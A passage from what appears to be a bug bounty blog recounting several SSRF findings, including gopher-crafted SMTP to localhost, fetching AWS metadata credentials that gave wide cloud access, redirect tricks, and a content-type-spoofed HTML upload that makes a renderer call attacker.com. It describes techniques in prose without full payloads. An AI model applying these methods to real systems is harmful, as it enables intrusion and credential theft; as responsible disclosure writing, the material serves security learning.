This feedback mechanism made me realize that this was more than a simple CRUD app and this service must be issuing an HTTP request to the specified address. I put a Burp collaborator address in to confirm and sure enough I saw a request come in.
I was able to use the feedback mechanism to perform a local port scan and found a number of services online: SSH, SMTP, DNS, and a few others that I couldn’t identify by port. To get to work on proving the impact here, I ended up performing a similar set of tests as I did with DuckDuckGo: I checked redirect and gopher behavior and was lucky enough to find that both were available.
Now that I had gopher available, I was able to prove some impact by crafting an SMTP message in gopher and firing it at localhost:25
. Sure enough, moments later, a new email showed up in my inbox.
Aftermath
I was awarded $800 for this finding and received a rating of high
for this finding.
I was invited to a recently opened private program. If you’ve never been invited to a program that just opened up, then you may not be aware that you’ll get this sense of “blood in the water”: you know that all of your fellow hackers and friends who also got an invite are going to start tearing this program up in the next couple of hours and if you don’t want to miss out on any low hanging fruit, you need to be quick.
I started my process off by deciding to not look at the core domain but jump to interesting subdomains. I ran sublist3r
and discovered a couple of subdomains that mentioned cms
in their domain name. In my experience, cms
services tend to have many problems and that this might be a great place to take a look. I didn’t find much on the home page of this asset so I ran dirsearch
to see if there was anything potentially interesting hidden on the asset.
Sure enough, after about 15 minutes of pounding the asset I found an endpoint that mentioned something about user management
that would 302 to another endpoint. That endpoint had a login page for some management system. What’s more, there were some javascript files that referenced an API on this asset.
After discovering that the qa
subdomain of this asset had unobfuscated javascript, I was able to figured out how to call the api and what calls I had available to me. One of the calls was named createWebRequest
and took one url
parameter in a POST body.
By this point in my hacking I already knew that this asset was running on AWS so I wasted no time in trying to issue a request to this api endpoint for the AWS metadata ip address. Sure enough, we got a hit.
When I tried the AWS keys in the aws cli
client, I found that I had an absurd level of access to dozens of S3 buckets, dozens more EC2 instances, Redis, etc. It was a critical in every sense of the word.
Aftermath
I was paid $3,000 (max payout) and the report was marked as a critical
.
This is the story of my most recent SSRF and, in a way, has been the most entertaining SSRF I’ve ever found. I started hacking on this new private program I was invited to. I started to look at the core asset for issues. I found a couple stored XSS at this point and was in a really great mood. I was about to wrap up shop when I took a look at the burp collaborator instance that I had left open. What I saw would surprise me.
As an aside: one of the things I do when I’m signing up for services that I’m going to hack on is that I use a burp collaborator instance to review email. It’s a good way for me to not pollute the email accounts I have with annoying advertisements after I’ve finished hacking on a service and it also lets me see if anything interesting is happening after the fact.
Anyway, when I looked at burp collaborator, I noticed that it had received an HTTP request with a User-Agent
that mentioned the service that I was hacking on. I thought to myself, “Did I just accidentally discover a feature that could be vulnerable to SSRF?!”. I set out to figure out how to trigger this again.
Well, putting the timeline of requests together clearly explained what happened. I had just signed up for this service with an email like user@abc123.burpcollaborator.net
and seconds later received both an SMTP message (email) and HTTP request for the homepage.
I signed up again with an email address like user@1.2.3.4.xip.io
to see if I could check if 302 behavior was respected. After receiving the forwarded request in my burp collaborator instance, I wanted to confirm that gopher worked as I had noticed that this request was fronted by Squid Proxy (which would probably block my attempts to access the internal network).
Similar to the previous stories, I checked the gopher protocol on a 302 redirect and noted that I was able to use it to interact with internal services. Unfortunately, there was no feedback of any kind so I wouldn’t be able to perform a port scan here. I decided to try for a localhost smtp message anyway to see if I could get lucky.
Sure enough, after crafting a message and performing the attack, I received a new email in my inbox proving that this SSRF was real and dangerous.
Aftermath
Well, unlike the previous stories, I have yet to get paid for this finding. The good news is that my report has been triaged as a high
so I’m just waiting for a final determination on the payout. I’ll probably post about it on my Twitter (which you should go follow if you haven’t yet).
I wish I could say that this story was inspired by Nahamsec and Daeken’s SSRF talk at Defcon but I had found this roughly a year prior to their talk being released. I was hacking on a new program for a company in the financial space. It was a product I had never seen (or heard of) before and was heavily involved in analytics. One of the features allowed you to upload images and store them for use in a couple of others features in the product.
Of course, one of the tests that I want to perform here is “Can I upload HTML” and if so, “What happens if that HTML fetches external resources”?
I tried uploading an HTML file but found that the service rejected the upload. I tried to see if I could lie about the content type in the multipart upload by changing it to say image/jpeg
and sure enough it uploaded the document fine.
After making a request to this other endpoint that gave you updates on the status of the document, it would trigger an internal renderer/browser to issue a request to attacker.com
.